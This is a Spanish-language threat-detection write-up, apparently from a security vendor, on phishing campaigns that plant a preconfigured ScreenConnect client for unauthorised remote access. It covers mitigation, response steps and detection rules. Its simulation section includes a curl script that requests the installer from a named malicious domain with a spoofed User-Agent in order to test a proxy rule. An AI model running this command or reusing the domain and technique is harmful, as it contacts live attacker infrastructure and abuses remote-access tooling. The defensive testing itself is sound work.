El cliente de ScreenConnect se utiliza indebidamente para habilitar el acceso remoto no autorizado
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los atacantes están utilizando correos electrónicos de phishing para distribuir un cliente ScreenConnect legítimo y preconfigurado. La herramienta de Monitoreo y Gestión Remota (RMM) establece una conexión de retorno a una instancia controlada por el atacante, proporcionando acceso remoto a los sistemas comprometidos. La campaña abusa de la naturaleza confiable del software legítimo para evadir controles de seguridad básicos y mecanismos de detección.
Investigación
El investigador examinó un correo electrónico de phishing que contenía un enlace que entregaba un archivo PE. El análisis confirmó que el archivo era un cliente ScreenConnect legítimo y firmado digitalmente. Sin embargo, su configuración incrustada había sido modificada para conectarse a una instancia de retransmisión específica y un ID de instancia controlado por el actor de la amenaza.
Mitigación
Los navegadores pueden bloquear descargas de archivos ejecutables como una capa inicial de protección. Las organizaciones deben monitorear el uso no autorizado de herramientas RMM y aplicar controles estrictos sobre los ejecutables descargados de enlaces web no confiables. La lista blanca de aplicaciones también puede ayudar a prevenir la ejecución de clientes ScreenConnect no autorizados y otro software RMM no aprobado.
Respuesta
Cuando se detecta actividad maliciosa, aísla el endpoint afectado para evitar el acceso remoto continuado por parte del atacante. Identifica y termina cualquier proceso activo de ScreenConnect. Realiza una revisión forense de la configuración del cliente para identificar la infraestructura de mando y control del atacante y determinar el alcance del acceso no autorizado al sistema comprometido.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Software de Acceso Remoto Alternativo / Gestión (vía creación_de_procesos)
Posible Actividad de Comando y Control mediante Intento de Comunicación de Dominio de Software de Acceso Remoto (vía dns)
Distribución de Malware Cliente ScreenConnect vía Correo Electrónico de Phishing [Proxy HTTP]
Ejecución de Simulación
-
Narrativa del Ataque y Comandos: El adversario pretende establecer persistencia en una estación de trabajo objetivo distribuyendo ScreenConnect a través de una campaña de phishing. En esta simulación, replicamos la etapa final: la máquina de la víctima realiza una solicitud HTTP saliente a un dominio comprometido/malicioso para descargar el ejecutable de configuración. Para imitar el comportamiento específico identificado en la inteligencia de amenazas, el «atacante» usa una cadena User-Agent personalizada
ScreenConnectmientras solicita la ruta de archivo específicathelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. Esto activará la regla de detección basada en proxy. -
Script de Prueba de Regresión:
# Este script usa curl para imitar la solicitud de descarga maliciosa identificada en la regla de detección. # Usa la URL específica y el User-Agent específico requeridos para activar la alerta. TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe" MALICIOUS_UA="ScreenConnect" echo "[*] Simulando intento de descarga de ScreenConnect..." echo "[*] URL: $TARGET_URL" echo "[*] User-Agent: $MALICIOUS_UA" # Usamos -k para ignorar errores de SSL si el dominio simulado usa un cert auto-firmado, # y -A para establecer el User-Agent específico. curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null echo "[*] Comando de simulación enviado." -
Comandos de Limpieza:
# No se descargaron archivos al host en la simulación (redirigidos a /dev/null). # No se realizaron cambios en el sistema. echo "[*] Limpieza completa. Sin rastros en el host."